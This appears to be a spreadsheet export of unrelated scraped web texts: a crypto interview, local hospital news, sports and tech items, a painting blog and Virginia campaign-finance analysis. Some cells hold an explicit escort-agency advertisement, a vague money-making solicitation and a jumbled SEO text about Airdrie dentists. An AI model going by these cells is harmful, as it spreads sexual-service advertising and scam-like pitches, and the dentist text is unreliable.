transferred to the general population. Well then, why is cryptocurrency better? Because cryptocurrency has a defined set of inflation. So inflation is defined based on a contract, it’s not controlled by one single power, it’s distributed across and it’s decentralized across multiple different entities that are engaged in that specific cryptocurrency. Every cryptocurrency has its own inflation and its own policy in terms of who is rewarded in that model of inflation, but Bitcoin for example has its set inflation. The amount of currencies will never be more than 21 million coins minted, and Bitcoin Cash by the same token, in that same model as well. That may be true, but in the real life adoption it’s really hard to buy coffee with a Bitcoin that’s worth $11,000 or maybe 95-82 within a matter of an hour. So how is the industry, – and the industry has evolved, there’s no doubt about it – where does the industry need to go, how is it evolving still to ensure that there are products that are worth it for the average consumer to still be able to sustain real-life transactions? So that’s a totally valid point. The industry has been developing; it’s a really young industry. We’re 10 years old, right, the crypto industry. Bitcoin cash is two years old. We’re really young. But we talked about traveling, I was just in Ljubljana, a city in Slovenia, we had more than 450 merchants in Ljubljana that accept Bitcoin Cash. I arrived, I took a taxi from the airport to my hotel, I paid my hotel, I went go-karting, I had a haircut – and by the way, go-karting was the most fun experience out of the lot – I went to the Apple Store, an Apple dealer, I went to a supermarket, in all of those – I went to a bar, I went to a restaurant – I paid with Bitcoin Cash at every single outlet. The only place I couldn’t pay with Bitcoin Cash was a government-controlled, subsidized, public swimming pool when I wanted to do my training. I had to pay 1.50 Euro for a beautiful swim in a nice 50 metre pool. But other than that… And it was a great experience, to be able to do that at the swipe of a phone off my mobile wallet onto a QR code, and immediately settled. The ability and the adoption rate was made possible thanks to stablecoins. So the ability to have an environment where as a merchant, I do not need to deal with that variability, that the crypto industry is really suffering with… But stablecoins is really one way to help and as volume grows, the crypto itself will become more and more stable. And I think the other thing that’s changed since the last sort of waves that we’ve gone through is the maturity in the industry. So we are much more savvy about cryptocurrencies. We are also a lot more mature in terms of being able to create liquidity, and the financial instruments that have entered into cryptocurrencies have enabled us to not only look at trading right now, but also be able to build our future forecasts and be able to predict into the future a bit better and manage that exposure that we might have to the crypto industry. The pushback is real though. Politically, we have the Senate Banking Committee, we had the Facebook Libra really defending the project, and defending the technology at some point. What are the popular misconceptions right now, globally, that you’re feeling from governments and regulators as to the threat of crypto, or of blockchain? So I think governments are torn between two angles. On the one hand they want to be able to limit the amount of data these big tech companies have. So we have rules like GDPR where you have to clearly define what data you’re collecting, make sure that data is available, and be able to delete that data at any point in time… The right to be forgotten. The right to be forgotten. And then on the flip side, I want to collect data. When it comes to money, I want to collect as much data as I possibly can. From a user, I will have this KYC, I want to have these passport controls, and all these new rules about collecting data. So on the one hand, I want to limit the data and I want the ability to delete all the data and on the other side, I want to collect as much data as I possibly can. That collection of data is against centralized – it goes to the government, but the centralization of data when it comes to all these other websites, it’s not allowed to go to the government, it’s not allowed to go to any other company. I think there’s a big conflict there. And how do you manage that, particularly in businesses when you collect data as it relates to money? So banks as a business, they will allow to collect money and they will share that data with any government institution or regulator that’s requesting data associated with a specific bank account. But it feels like the threat of the innovation that blockchain in cryptocurrency has already given us is really real. If regulators and countries clamp down, if China says ICOS are illegal, that cryptocurrency is illegal, India says, “you face a 10 year jail sentence,” the US says “we will investigate, shut your business down because you are trading a security or a commodity with American citizens without registering with us…” This is happening around the world right now. So is there a potential threat that all of this innovation that’s happened is gonna be shut down? So I think innovation’s happening in two-folds. One is the consumerization of the innovation and the other one is the depths of innovation in terms of technology, in terms of how the ability to provide the technology in a very complicated word “non-custodial fashion.” So there’s this word. I can either build innovation around custody and around non-custodial services. And blockchain has enabled this thing called non-custodial – what does that mean? That basically means the control is in me, the user, and the responsibility lies with me as the individual where innovation on a non-custodial basis is very hard to attack and diffuse. However, it is a centralized point. I can attack that centralized point, shut it down and say, you’re innovating in a negative way, or in a way that we as a government or as a nation feel is inappropriate. But when it’s in a decentralized manner where the end user has control over their own data, over their own money, all of a sudden that becomes a very different way of managing, of doing business, which in the past has not been the way it has been encountered. The downside with the non-custodial fashion has been the user experience. It’s been a bit more difficult. I have to have my private key, I have to have these 12 words that I have to remember. If I lose those 12 words, I lose my private key, I lose all my money, I lose all my data. And that is something that the user all of a sudden has to take responsibility for, and I think the population is at an inflection point where a certain part of the population is ready to take on that responsibility, and that population on a global basis is growing. Whereas on the flip side, there is still a large portion of the population, and let’s be fair, it’s the majority of the world’s population, that is not ready to do that. But you’re seeing the young emerging generation – the gaming community, the eight, nine million people a day watching Friday Fortnite on Twitch. Those people, they are more willing and more ready to play around with digital money, and take control on their own mobile phone, in their own hardware wallet, on whatever asset or digital secure device they have. That evolution is happening right now, it’s either a revolution or an evolution, but I think you’re right, it is an evolution as the younger generation really gets more comfortable with this technology. But right now, we have a generation that is in control, where Internet didn’t exist for a lot of them until much later in their lives, and then we have a system that has given us FATF which is the Financial Action Task Force that takes a look at money laundering and then really is very, very specific about Know Your Customer, KYC and AML, anti-money laundering, because crime, terrorism – this is a real threat even in traditional fiat money. Now cryptocurrency – There’s definitely a threat and I think if I look at the backlash, as you call it, that we’ve been experiencing over the last two, three weeks, particularly with the FATF, the G7, the G20, the hearings that we’ve had, Mnuchin, Trump tweets etcetera – you look at all of that, the backlash is a result more of the need to educate the regulators about what cryptocurrency really is. And the fact that there is no… I had a meeting with the CEO of one of the world’s largest banks. It was always a feel for who’s losing in all of this. There always has to be a loser. If I’m winning, somebody’s losing. There’s always this tag team and it’s really hard to pinpoint in the crypto world. There’s no loser, there’s nobody there I can grab hold of. And I think as the crypto world matures, and as the regulators understand more about how this is actually really working, and what I need to regulate better, is do I need to do code audits? And everything is transparent by the way, on the blockchain, right? Every single trans...</t>
  </si>
  <si>
    <t>Paramedics must wait until the patients in their care are properly turned over to the emegency department at Brantford General Hospital. Brian Thompson / Expositor file photo Outside the Brantford General Hospital emergency department, ambulances line up with patients. Paramedics can’t leave until the patients in their care are properly turned over to the emergency staff. Inside the department are patients who have had their critical needs met and now need a bed. On July 18, there were 17 such patients. They waited in zone rooms and sometimes hallways because no beds are available. Meantime, in BGH, as of July 17, there were 52 patients who no longer needed hospital care. Instead, they needed alternative care, such as a bed in a long-term care home or home care. No long-term care beds are available. About 35,000 Ontarians are on the wait list. This means the city and county to consider adding more ambulances because every day there are incidents where there’s no ambulance available to take a call and neighbouring communities have to be called on for help, a problem that links directly back to too few long-term care beds. “We have to keep the flow going,” said Wendy Pomponio, vice-president of clinical programs and chief nurse executive at the Brant Community Healthcare System, which runs BGH and the Willett urgent care centre in Paris. Pomponio said every alternative is examined to help move people out of BGH once they no longer need hospital care. More long-term care beds would relieve the situation, Pomponio said. Jane Meadus a lawyer with the Advocacy Centre for the Elderly in Toronto, said she doesn’t necessarily believe keeping people in the overcrowded hospitals where beds are at a premium is the best choice, but she wants people to know their options. “Unfortunately, there are no beds in long-term care so there’s a great pressure on the hospital due to people who shouldn’t be in the hospital,” she said. “So, they tell people, ‘You can’t be in the hospital.’ “The real issue is the governments haven’t planned properly and there are 20,000 people across the province on the waiting list for long-term care.” Meadus said people should know that: Any patient has the right to apply to long-term care and doesn’t need permission to do so; Patients don’t have to be in a retirement home to apply to long-term care The hospital or LHIN can’t offer a patient a long-term care bed at a facility where the patient didn’t apply. Patients don’t have to sign a contract and do not have to take the “first available bed” in a home they didn’t apply to. The Long-term Care and Health Care Consent Acts both make clear it’s up to the applicant or their decision-maker to decide on placement, not hospital staff. SGamble@postmedia.com @EXPSGamble</t>
  </si>
  <si>
    <t>Currency Bird is a Chilean payment remittance company. They will mostly be adopting xCurrent among all the Ripple payment solutions. Ripple continues to partner up with financial institutions all over the world. After MoneyGram and Sentbe, the decentralized payment company has partnered up with Currency Bird. Currency Bird is a Chilean payment remittance company. As per Currency Bird, the partnership will allow then to add new payment routes and improve the speed and cost of international remittances: “The addition to Ripple Net will bring many benefits for the more than 12,000 Currency Bird customers, as it will allow the company to add new routes to its more than 50 destinations, new currencies, better prices and faster transfer speeds, all using the technology developed by Ripple based on blockchain, which allows the transfer of digital data with sophisticated and secure coding.” The company went live on RippleNet this month after signing an agreement in March. While they have not yet revealed which of Ripple’s payment solution it will be adopting, but it will most probably be xCurrent.</t>
  </si>
  <si>
    <t>Source: http://feeds.maketecheasier.com/~r/MakeTechEasier/~3/U0GnY0flveM/ How Tracking Pixels Monitor Your Email, and How You Can Stop Them You know that little “Do you want to send a read receipt?” message you get every now and then when you open an email? You might reasonably assume that if you don’t see that message, you’re not sending anything back. That’s not necessarily true. Thanks to the magic of something called a tracking pixel (a tiny image embedded in HTML and/or JavaScript), just opening the email can tell the sender not only when you did it, but your IP address (and, therefore, your location), email client, and operating system. Tracking pixels have been around for quite a… Read more Source: http://feeds.maketecheasier.com/~r/MakeTechEasier/~3/U0GnY0flveM/ The post How Tracking Pixels Monitor Your Email, and How You Can Stop Them appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Welcome to escorts in Risby HU16, covering the whole area of East Riding Of Yorkshire. We have escorts serving the flats, homes and local hotels in Risby and the surrounding East Riding Of Yorkshire areas. Risby Escort East Riding Of Yorkshire Escort Services Risby Escorts - Girls Who Know How to Fulfill You in East Riding Of Yorkshire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Risby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The Risby escorts are capable of performing various activities. While you are searching for a decent companion, you would want one that can provide multiple different girlfriend, sexual submissions or role-playing services. The most exclusive and elite agencies will be capable of providing these type of services along with many more services that you might require. This will allow you to realize your deep fantasies. Meaning once the escort has reached the destination, she will call the agency and inform them about the same; this ensures that the East Riding Of Yorkshire escort has reached safely and on time and she has the qualities that you requested for. Escorts in Risby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Risby,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Blair Location: Risby (HU16 5) Nationality: Polish Spoken Language: English, Spanish Age: 23 years old Weight: 66.8kg (147lb) (10st - 7lb) Height: 5 feet 4 inches (162.56cm) Dress Size: S Shoe Size: 43 Hair Leigh: Long Hair Color: Bronde Eye Color: Brown Breast: Silicone Breast Size: C Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: Yes Drinking: Yes Availability Area: Risby Outcall: East Riding Of Yorkshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Blair Escort Name: Shelby Location: Risby (HU16 5) Nationality: Scottish Spoken Language: English, Lithuanian Age: 23 years old Weight: 58.6kg (129lb) (9st - 3lb) Height: 5 feet 7 inches (170.18cm) Dress Size: M Shoe Size: 40 Hair Leigh: Short Hair Color: Brunette Eye Color: Blue Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Risby Outcall: East Riding Of Yorkshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Shelby Escort Name: Willa Location: Risby (HU16 5) Nationality: Argentine Spoken Language: English, Polish Age: 22 years old Weight: 55.0kg (121lb) (8st - 9lb) Height: 5 feet 9 inches (175.26cm) Dress Size: XXL Shoe Size: 37 Hair Leigh: Short Hair Color: Nude Blonde Eye Color: Brown Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Risby Outcall: East Riding Of Yorkshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Willa Escort Name: Margot Location: Risby (HU16 5) Nationality: Swedish Spoken Language: English, Spanish Age: 21 years old Weight: 67.7kg (149lb) (10st - 9lb) Height: 5 feet 10 inches (177.80cm) Dress Size: M Shoe Size: 34 Hair Leigh: Long Hair Color: Bronde Eye Color: Brown Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: Yes Smoking: Occasionally Drinking: No Availability Area: Risby Outcall: East Riding Of Yorkshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Margot Escort Name: Ursula Location: Risby (HU16 5) Nationality: Welsh Spoken Language: English, Dutch Age: 23 years old Weight: 45.9kg (101lb) (7st - 3lb) Height: 5 feet 6 inches (167.74cm) Dress Size: S Shoe Size: 43 Hair Leigh: Medium-Length Hair Color: Contrast Melt Eye Color: Hazel Breast: Natural Breast Size: C Pubic Hair: All Natural Tattooed: No Piercings: No Smoking: No Drinking: Yes Availability Area: Risby Outcall: East Riding Of Yorkshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Ursula Risby Brazilian Escort, Risby Scottish Escort, Risby Walsh Escort, Risby Independent Escort, Risby Female Escort, Risby Cheap Escort, Risby Chinese Escort, Risby Blonde Escort, Risby Incall Escort, Risby French Escort, Risby Black Escort, Risby Outcall Escort, Risby Bisexual Escort, Risby Irish Escort, Risby Mature Escort, Risby British Escort, Risby Brunette Escort, Risby Horny Escort, Risby Asian Escort, Risby Gay Escort, Risby Busty Escort, Risby Young Escort, Risby Male Escort, Risby Ebony Escort, Risby Indian Escort, Risby Indian Escort, Risby Massage Escort , Risby Polish Escort, Risby Porn Escort, Risby Teen Escort, Risby Best Escort, Risby Agency Escort, Risby Erotic Escort, Risby Spanish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Risby appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>Virgil Van Dijk Says 'Time Has Come' For Defender To Win Ballon d'Or Liverpool centre-back Virgil van Dijk believes ‘the time has come’ for a defender to win the Ballon d’Or after years of dominance from attacking players. You have to go back as far as 2006 for the last time a defender won the esteemed individual prize when Fabio Cannavaro was rewarded for an excellent year in which he captained Italy to the World Cup. After winning the Champions League and producing a man of the match display in the final against Spurs, along with picking up the PFA Player of the Year courtesy of a series of imperious defensive displays for the Reds in the Premier League, Van Dijk is a leading contender for this year’s Ballon d’Or. .@VirgilvDijk is focused on slaking his thirst for more trophies with the Reds rather than securing the Ballon d’Or :red_circle: Our big interview with VVD… – Liverpool FC (@LFC) July 20, 2019 And though the man himself is more focussed on winning silverware with his team, he wants to see defenders get the same credit that the attackers receive when it comes to individual awards. “To get the PFA Player of the Year is a fantastic honour,” Van Dijk said in an interview with Liverpool‘s official website. Pucker up :kissing_heart::trophy: Describe Van Dijk’s season in a word…#UCLfinal @LFC pic.twitter.com/BaIcYYxyl3 – UEFA Champions League (@ChampionsLeague) June 1, 2019 “It’s the highest honour you can get because it’s voted by your fellow peers. I said it back then as well, I would trade it for the Champions League. Luckily, I didn’t have to. “It’s an honour if people are talking about [the Ballon d’Or], but what can I do? I have no influence on anything. “I can’t deny I had a pretty good season last year, so the only thing I can do now is just focus on the new season, getting fit, stay fit and hopefully get an even better season than I had last year. “I can understand the fact that normally strikers or No. 10’s win these awards because it’s more attractive to see. But maybe the time has come to change it.” Van Dijk has inevitably had a lot of Ballon d’Or related questions thrown his way but when asked about following the Champions League triumph in Madrid, he was adamant that Lionel Messi should win the trophy for the sixth time. Van Dijk: “I think Messi is the best player in the world. He should win the Ballon D’Or. So I’m not thinking of that. But if I win, I’ll take it. Messi should win it though. He is the best in the world, whether he’s in the final or not.” – Miguel Delaney (@MiguelDelaney) June 1, 2019 FootyNews put the question to our audience on Twitter and after 30,000 votes were cast on a poll, 54 per cent concurred with the Dutch defender that Messi should win. Who deserves to win the 2019 Ballon d’Or? :trophy: – FootyNews (@sportbible) June 5, 2019 This post Virgil Van Dijk Says 'Time Has Come' For Defender To Win Ballon d'Or appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Urgent Temp Labour Needed for Covering Company at the Port of Montreal. Hard hat and protective footwear required. High vis vest will be provided. Needed for 2 to 3 days. $25.00 per hour. Must not be afraid of heights, must be in good physical condition and must be able to work outdoors. Needed for July .. Read more</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190731/p29#a190731p29 Fitbit beat analyst estimates with Q2 revenue of $314M, up 5% YoY, but lowered Q3 guidance; stock down 14%+ after hours (Lauren Feiner/CNBC) Lauren Feiner / CNBC: Fitbit beat analyst estimates with Q2 revenue of $314M, up 5% YoY, but lowered Q3 guidance; stock down 14%+ after hours — KEY POINTS — The Fitbit Ionic has a few apps, with more to come — Shares of Fitbit cratered as much as 21% after hours on Wednesday after the company cut guidance … Source: http://www.techmeme.com/190731/p29#a190731p29 The post Fitbit beat analyst estimates with Q2 revenue of $314M, up 5% YoY, but lowered Q3 guidance; stock down 14%+ after hours (Lauren Feiner/CNBC) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Yes, I know all the art-school stuff about additive and subtractive colour. (Black is either the complete absence of colour or the sum of all of them.) I don’t mean that. I mean, “How do you paint a person with black skin?” The answer is quite interesting. The composition on which I am working at the moment has at its centre a man with black skin.* I have developed the habit recently of making sure that I use live models whenever I am painting the human figure, because my figure-drawing without a model is iffy. So I approached a friend of mine from Antigua, and he very kindly agreed to pose for a couple of reference photographs. Unfortunately we conducted the session in artificial light. Although the figure-drawing part of the exercise is fine the details of his facial features have not come out too clearly, partly because of the quality of the light and partly because of the very dark colour of his skin. Not deterred, I resorted to the internet and downloaded a picture of Lenny Henry that I thought would help to check on and qualify my own resources. (My friend will certainly find that hilarious.) I have to say that its has all worked out very well indeed, and I’m getting on well with the picture. I did encounter an additional problem, however, that will be of general interest. What colour is “black”? As I think I mentioned in a recent blog, it can really be quite important to limit the use of black in painting. How should I go about painting the skin-colour of a person of Afro-West-Indian origin? I asked myself what kind of colour-mix would answer my needs. My first port-of-call was the shelf-full of art books I have accumulated.** Not surprisingly they often carried advice about how to mix flesh tones. To my amazement, however, they all assumed that the subjects of painting had white skin. Not a single one gave any consideration to the possibility that the subject of a portrait might by Afro-West-Indian. I have made my own experiments, and it is working out quite well, using a dark blue in many circumstances to darken the tone of the skin, and discovering that a convincing colour even for a “black” man depends upon quite a high proportion of red. I am still feeling my way with this one, but it has made me think. Over dinner tonight I shared the experience with my wife, and she told me an amusing anecdote that is apposite on this occasion. Her sister once related how a close friend of hers had never encountered the second person singular while learning French in school. He had been told by the teacher that it was unlikely that he would ever know a frenchman well enough to need it. Perhaps the art manuals I’ve accumulated all share the premise that none of their readers is ever likely to be sufficiently interested in a black subject to want to paint them. *I know that these days many people prefer to refer to “persons of colour”, but believe me, my model has very dark skin. **Old habits die hard, and my former tendency as an academic to acquire too many books is perhaps the only surviving characteristic of my previous career.</t>
  </si>
  <si>
    <t>Nelson: What life we lived under the Dome – After all, there was already a similarly named hockey arena up north at Northlands in Edmonton and no one really wanted to . Full information about Blunston Dental Group in Airdrie, 1, 620 1 Ave NW, Airdrie, AB T4B 2R3, Canada, Address, telephone number, fax, postal code, website addres, work. “It’s phenomenal,” says Airdrie Mayor Peter Brown. “We were one of the fastest-growing communities in Canada, certainly in. Canada’s largest municipal rooftop solar array completed – Airdrie’s Genesis Place Recreation Centre is celebrating the completion of its new rooftop solar array. The $2.8 million, Below is a list of all Dentist in Airdrie, Alberta, Canada. Did not find your agency on the list? You can add your Dentist through the form in the top right corner of the site. The Medicine Hat AAA All-Stars will look to punch their ticket to the Junior Little League Canadian Championship when they. Midtown Plaza Dental is one of the Dentists in Airdrie, Alberta, located in 201-1 Midtown Blvd SW, Airdrie, AB, T4B 4E7. 64 East Lake Avenue NE , Airdrie, In a slightly different approach to launching its new Forever Smiles Teeth Whitening Service, Confidental Airdrie, a Dentist in Airdrie AB has decided it will offering. This launch celebration is. Dentist Phone number: +1 403-948-7377 Province: Alberta City: Airdrie Address: 216 Main St NE, Airdrie, AB T4B 0R6, Canada, Airdrie, Alberta, T4B 0R6. Number 1 Dentist In Airdrie Alberta Top Dentist In Airdrie See here the whole list of our best Dentists from Airdrie and their surroundings reviewed by StarOfService community from Calgary – Alberta. Do you want to know who is in the top. Search or browse RateMDs</t>
  </si>
  <si>
    <t>If you are a producer and you want your track to be promoted on this channel, complete the "Submit Track" form here: https://www.riddimdub.com Buy: https://ffa.fanlink.to/MIL/ Azabim: https://web.facebook.com/AzaBimFR/ https://www.instagram.com/AzabimDubz/ Dobza: https://web.facebook.com/DobzaDub/ Full Flex Audio: https://www.fullflexaudio.co.uk/ https://www.facebook.com/fullflexaudio/ https://twitter.com/fullflexaudio/ https://www.instagram.com/fullflexaudio/ https://www.youtube.com/channel/UCMr1zCSDPCjd1oerDTKcXhQ/ Like our Facebook: https://www.facebook.com/riddimdub Radio: https://radio.riddimdub.com Newsletter: https://newsletter.riddimdub.com Instagram: @RiddimDub Paypal: https://www.paypal.me/Sumutiu Merch: https://merch.riddimdub.com G2A: https://www.g2a.com/r/riddimdub #RiddimDubstep […] The post Azabim – More is Less (Dobza Remix) [More Is Less EP – Full Flex Audio] appeared first on Dubster.</t>
  </si>
  <si>
    <t>Alice Holloway</t>
  </si>
  <si>
    <t>Specifically focusing on the front nose, Toyota Gazoo Racing have made changes to the bodywork of their TS050 ahead of its final season racing in LMP1 for the 2019/20 FIA World Endurance Championship. The more prominent front nose gives the illusion of a single-seater’s front wing on the newly revised Toyota, which is the highlight of Toyota’s aerodynamic redesign on their LMP1 car. Pushing back the bodywork on either side of the nose reveals more of the splitter, and shows the shape and curves of the design much more clearly that past renditions. With the regulations of the LMP1 class locked in until next year, when the ‘Hyper Cars’ that Toyota have already committed to running come onto the field, there is not much in terms of developments or changes in the class. However, Pascal Vasselon, the team’s Technical Director, explained that, due to the Privateers’ developments throughout the SuperSeason, “You see a big step in their performance. Out of respect for their ability to improve their cars and extract more performance from their package, we could not stand still.” “The most obvious change is the bodywork,” Vasselon explained on release of the images of the new look for the TS050. “We have updated the aerodynamics of the car and elsewhere there are minor modifications for reliability. “We introduced the TS050 HYBRID in 2016 so there has been ongoing development over the seasons… Our car for this new season is not radically different from last season’s car.” Team President Hisatake Murata added: “As a team we have grown stronger and more resilient during the TS050 HYBRID era and we need to demonstrate this again as we challenge to defend our titles and, in parallel, prepare for the new hypercar regulations.” This season will see the send off of the TS050 which has raced in the WEC since 2016. In its 26 races, it has earned 13 victories, 21 podiums, 11 pole positions, one Constructors’ Championship, one Drivers’ Championship and two 24 Hours of Le Mans victories. The six 2019/20 drivers will be looking to build on this impressive record for the car, hoping to secure another Drivers’ Championship, Constructors’ Championship and Le Mans victory by the end of its racing campaign.</t>
  </si>
  <si>
    <t>Francesca Mann</t>
  </si>
  <si>
    <t>Walkaway residents had corellas, skip bins and public toilets on their minds when they were invited to ask questions before a recent City of Greater Geraldton’s agenda forum.</t>
  </si>
  <si>
    <t>The Justice Department says five inmates will be executed, starting in December.</t>
  </si>
  <si>
    <t>According to the Sun’s Alan Nixon, Steve Bruce is planning to make a £5m bid for Everton midfielder James McCarthy – with the club also negotiating a cut-price move for Swedish international right-back Emil Krafth. Starting with McCarthy, Nixon claims that the Irish midfielder is available at a knock-down fee after entering the final year of his current contract at Everton, stating that Bruce is keen to bolster his midfielder options. The piece also states that the 28-year-old would be keen to make the move to Tyneside, but also has interest from Crystal Palace. Steve Bruce plotting £5m bid for James McCarthy | @reluctantnicko https://t.co/XAr1zx1118 pic.twitter.com/jlpr6X5HoC— The Sun Football (@TheSunFootball) July 28, 2019 He’s approaching his 30’s and has been very injury prone over the past few years, but this *might* be a deal Ashley would sanction if he was signed on the cheap. Then to Krafth. The Chronicle confirmed that we’d sent scouts to watch the Amiens right-back in a friendly with Hull earlier this week, and Nixon reports that we’re currently trying to push through a cut-price deal for the 24-year-old Swede: Newcastle trying to push through cut-price transfer for Emil Krafth | @reluctantnicko https://t.co/o7lqt40HVa pic.twitter.com/GkTw7nM3zC— The Sun Football (@TheSunFootball) July 28, 2019 What’s bizarre about this story is the fact he claims a £1m deal is being discussed – despite the fact Amiens paid double that to sign him permanently following a successful loan spell in France last season. (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>Hello friends … let me show you how to get your own internet business selling products and services provided by someone else and earn large p rofits. Everything is provided for you. If you are interested send us your name, email and phone number and we are going to get back to you with the .. Read more</t>
  </si>
  <si>
    <t>See below for graphics, courtesy of VPAP, showing “Donations to General Assembly candidates January 2018 through June 2019.” I have a few comments on these numbers as well. When it comes to small-dollar donors, House of Delegates Democratic incumbents and candidates are dominating Republicans — the top 16 are all Democrats, as are the top 21 out of 23. Definitely seems like a pattern here. The top five House Democrats in terms of small-dollar donors are: 1) Del. Danica Roem ($97,424; also note that 25% of all her donations were from small donors); 2) Shelly Simonds (30% from small donors); 3) Joshua Cole (33% from small donors); 4) Phil Hernandez (30% from small donors); 5) Del. Chris Hurst (15% from small donors). The top-ranked Republican, Del. Tim Hugo, received $30,114 from small donors, but that accounted for just 4% of his total fundraising from January 2018 through June 2019. Almost all the donations to House of Delegates incumbents/candidates from labor unions/non-business groups went to Democrats, with the first Republican (Speaker Kirk Cox) not showing up until wayyyy down the list. That’s not particularly surprising, given how anti-labor Virginia Republicans are. Top Democrats in this category were: 1) Del. Elizabeth Guzman ($113k; 36% of her donations were from Labor Unions/non-business business groups focused on social or ideological issues); 2) Del. Lee Carter ($67k; 41% of his donations from this category); 3) Del. Hala Ayala ($58k; 25% of her donations); 4) Del. Jennifer Carroll Foy ($56k; 21% of her donations); 5) Del. Wendy Gooditis ($56k; 21% of her donations). Republican House of Delegates incumbents and candidates ranked high (11 of the top 16) in this category, although clearly both Democrats and Republicans receive money from their parties. The leading House Republican (DJ Jordan) and leading House Democrat (Del. Elizabeth Guzman) are facing off against each other in HD31, which is a 56%-43% Ralph Northam district. As for Delegates Tim Hugo (R-HD40) and Roxann Robinson (R-HD27), they are both highly endangered Republican incumbents, with Hugo facing off against Democrat Dan Helmer in a 55%-44% Ralph Northam district and Robinson against Democrat Larry Barnett in a 51%-48% Ralph Northam district. So clearly Republicans are trying to protect those two. Not surprisingly, corporate donors just loooove the party of crony capitalism and corporate welfare, as House Republicans account for 13 out of the top 17 ranked incumbents and candidates in this category. Also not surprisingly, the top recipients of corporate money were the top-ranked House Republicans: Speaker Kirk Cox, Majority Leader Todd Gilbert, Majority Caucus Chair Tim Hugo, House Appropriations Committee Chair Chris Jones and House Commerce and Labor Committee Chair Terry Kilgore. Do these Republicans ever say no to anything big business wants? I bet it’s rare. When it comes to individual donors, House Democrats account for 18 of the top 22. This is, in a way, the mirror image of the Republicans’ domination when it comes to big corporate money. Top House Democratic recipients of donations from individuals are: 1) Den Helmer ($293k; 70% of his money from individual donors); 2) House Democratic Leader Eileen Filler-Corn ($217k; 48% of her money from individuals); 3) Del. Chris Hurst ($199k; 55% of his money from individuals); 4) Del. Danica Roem ($198k; 52% of her money from individuals); 5) Sally Hudson ($159k; 80% of her money from individuals). Looking at ALL donations since January 2018, House Republicans lead House Democrats, although the latter have been gaining ground recently. Top House Democrats in this category since January 2018 are: 1) House Democratic Leader Eileen Filler-Corn ($453k); 2) Dan Helmer ($421k); 3) Del. Danica Roem ($383k); 4) Del. Chris Hurst ($362k); 5) Del. Elizabeth Guzman ($314k). Just as is the case with the House, over on the Senate side, Democrats dominate when it comes to small-dollar donors, with just one Republican ranked in the top 16. The top Senate Democrats when it comes to small-dollar donors are: 1) Qasim Rashid ($101k; 65% of his total money from small-dollar donors); 2) Sen. Jennifer Boysko ($84k; 15% from small-dollar donors); 3) Sen. John Bell ($45k; 9% from small-dollar donors); 4) Amy Laufer ($38k; 12% from small-dollar donors); 5) Missy Cotter Smasal ($35k; 14% from small-dollar donors). Also, just as is the case on the House side, Senate Dems dominate when it comes to donations from labor unions and non-business groups focused on social or ideological issues. Again, why would any organization that cares about working people ever donate to a Republican? Top Senate Democrats in this category are: 1) Ghazala Hashmi ($76k; 27% from this category); 2) Del. John Bell ($69k; 14% from this category); 3) Del. Debra Rodman ($69k; 22% from this category); 4) Del. Cheryl Turpin ($63k; 33% from this category); 5) Missy Cotter Smasal ($62k; 24% from this category). The political parties are, unsurprisingly, putting money into some of the most competitive State Senate races, such as SD13 (Democrat John Bell vs. Republican Geary Higgins), SD10 (Democrat Ghazala Hashmi vs. Republican Sen. Glen Sturtevant), SD12 (Democrat Debra Rodman vs. Republican Sen. Siobhan Dunnavant), SD7 (Democrat Cheryl Turpin vs. Republican Jen Kiggans). Similar to the House side, corporate donors have definitely favored Republican State Senate incumbents over Democrats not named “Dick Saslaw.” The top Republican in terms of corporate money is Senate Majority Leader Tommy Norment, who received $420k, accounting for 71% of his total donations from January 2018 through June 2019. Other top Republicans also received a huge chunk of their money from corporate sources — 71% for Sen. Ryan McDougle, 71% for Sen. Emmett Hanger, 92% for Sen. Steve Newman, etc. And, shockingly, they voted consistently in support of big business over working people and the environment. Senate Democrats dominated (11 out of the top 15) in donations from individuals. Top Senate Democratic incumbents and candidates in this category are: 1) Sen. Jennifer Boysko ($243k; 45% of her total money from individuals); 2) Sen. Dick Saslaw ($224k; 20% of his total money from individuals); 3) Del. John Bell ($210k; 42% of his total money from individuals); 4) Amy Laufer ($186k; 58% of his total money from individuals); 5) Sen. Scott Surovell ($185k; 54% of his total money from individuals). Looking at all money raised since January 2008 by Virginia State Senate incumbents and candidates, it looks like Democrats are more than holding their own with Republicans The top Democrats on the Senate side in terms of total money raised since January 2008 are: 1) Sen. Dick Saslaw ($1.1 million – nearly twice as much as Senate Majority Leader Tommy Norment); 2) Sen. Jennifer Boysko ($547k); 3) Del. John Bell ($496k); 4) Sen. Scott Surovell ($354k); 5) Amy Laufer ($321k). Four of the top five Republicans are in districts won by Ralph Northam in 2017 and/or Tim Kaine in 2018 – Sen. Siobhan Dunnavant (52% Northam/57% Kaine SD12); Sen. Bryce Reeves (50% Gillespie/52% Kaine SD17); Sen. Glen Sturtevant (57% Northam/61% Kaine SD10); (50% Northam/52% Kaine SD8). All of these are potential Democratic pickups in 2019, which of course means we need to help their Democratic challengers.</t>
  </si>
  <si>
